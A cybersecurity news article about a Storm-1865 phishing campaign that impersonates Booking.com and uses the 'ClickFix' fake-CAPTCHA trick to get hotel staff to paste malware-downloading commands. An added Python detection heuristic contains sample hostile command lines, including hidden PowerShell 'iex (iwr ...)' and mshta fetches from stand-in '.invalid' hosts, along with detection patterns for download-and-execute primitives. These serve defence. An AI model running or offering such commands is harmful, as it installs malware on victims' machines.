Image: Jas Rolyn / Unsplash

Phishing campaign impersonating Booking.com targets hospitality sector with malware

This article was updated with comment from a Booking.com spokesperson.

Hotel and hostel workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. 

In a phishing campaign that began in December 2024 and has continued through February, the threat actors are targeting people in the hospitality industry across North America, Southeast Asia and Europe who are likely to work with Booking.com and to open emails from the travel platform. 

A report from Microsoft published on Thursday tracks a technique called “ClickFix” where hackers try to “take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware.”

“This need for user interaction could allow an attack to slip through conventional and automated security features,” Microsoft said. “In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.” 

The researchers tied the campaign to the group Storm-1865, which has launched several other phishing campaigns that involve stealing payment data and making fraudulent charges. 

The malicious emails included a variety of content, with some referencing bad guest reviews, account verification or demands from potential guests. 

Most of the emails include a link or a PDF attachment purportedly taking victims to Booking.com. When clicked, victims are taken to a fake CAPTCHA page where the ClickFix scheme is deployed. 

“This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard,” the researchers said, noting that the pasted command then downloads malware onto the victim’s device.
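The execution chain described above leaves a recognizable trace in endpoint telemetry: the Run dialog is hosted by explorer.exe, so a command the victim pastes into Win+R appears as explorer.exe spawning a script interpreter whose command line carries a remote URL, a hidden-window switch or a download-and-execute primitive. The following detection heuristic is an added example written for this page, not code from Microsoft or Booking.com. It assumes Sysmon Event ID 1 field names (ParentImage, Image, CommandLine) in a tab-separated key=value layout, and the sample events, interpreter list and command-line patterns are constructed for illustration; hostnames use the reserved .invalid TLD.

```python
"""Flag ClickFix-style executions in Windows process-creation telemetry.

Heuristic: explorer.exe (the Run dialog's host) spawning an interpreter whose
command line shows lure traits. Sample records below are constructed, not real
telemetry; field names follow Sysmon Event ID 1 but the layout is assumed.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix command is typically routed through (assumed list).
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}

# Command-line traits that, together with explorer.exe as parent, separate a
# pasted lure from a user who merely opened a shell from the Run dialog.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"https?://", re.I), "remote URL in command line"),
    (re.compile(r"\s-(?:w|win|windowstyle)\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
     "download-and-execute primitive"),
    (re.compile(r"\bmshta\b", re.I), "mshta script host"),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one tab-separated 'Field=value' record (assumed layout, Sysmon field names)."""
    fields = dict(part.split("=", 1) for part in line.rstrip("\n").split("\t") if "=" in part)
    return ProcessEvent(fields.get("ParentImage", ""), fields.get("Image", ""), fields.get("CommandLine", ""))


def clickfix_indicators(ev: ProcessEvent) -> list:
    """Reasons this event looks like a command pasted into Win+R; empty list if it does not."""
    if image_name(ev.parent_image) != "explorer.exe":
        return []
    if image_name(ev.image) not in INTERPRETERS:
        return []
    return [label for pat, label in SUSPICIOUS_PATTERNS if pat.search(ev.command_line)]


def scan(lines) -> list:
    """Return (line_number, indicators) for every record that trips the heuristic."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = clickfix_indicators(parse_event(line))
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample telemetry (not real events). Records 1, 2 and 5 are benign
# or out of scope; 3 and 4 mimic a pasted lure.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\notepad.exe"
    "\tCommandLine=notepad.exe C:\\Users\\frontdesk\\notes.txt",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell.exe",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -c \"iex (iwr http://verify-captcha.invalid/r.txt)\"",
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta https://booking-verify.invalid/captcha.hta",
    "ParentImage=C:\\Windows\\System32\\services.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -c \"iwr http://updates.invalid/agent.ps1\"",
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_EVENTS):
        print(f"event {n}: {'; '.join(reasons)}")
```

The parent-process filter is what keeps the rule quiet: a user who opens PowerShell from the Run dialog trips nothing, and a service-spawned download (record 5) is deliberately out of scope for this rule. The heuristic misses a command pasted into a terminal the user already had open; the Run dialog's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a complementary forensic source when triaging a suspected victim.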

Microsoft found several different strains of malware deployed on victim devices, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT.

All of the malware strains allow the hackers to steal financial information and credentials. 

A spokesperson for Booking.com said the “actual numbers of accommodations affected by this scam are a small fraction of those on our platform” and the company has made “significant investments to limit the impact” on their customers and partners. 

“While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware,” the spokesperson said.

Microsoft noted that Storm-1865 targeted hotel guests in 2023 using another Booking.com lure, and in 2024 it attacked e-commerce customers with phishing messages. 

These campaigns have increased in volume since early 2023, Microsoft said. 

The tech giant urged hospitality workers to always check a sender’s email address, to look for typos in emails and to be wary of any message that pressures them to take an action.


Jonathan Greig

is a Breaking News Reporter at Recorded Future News. Jonathan has worked across the globe as a journalist since 2014. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia. He previously covered cybersecurity at ZDNet and TechRepublic.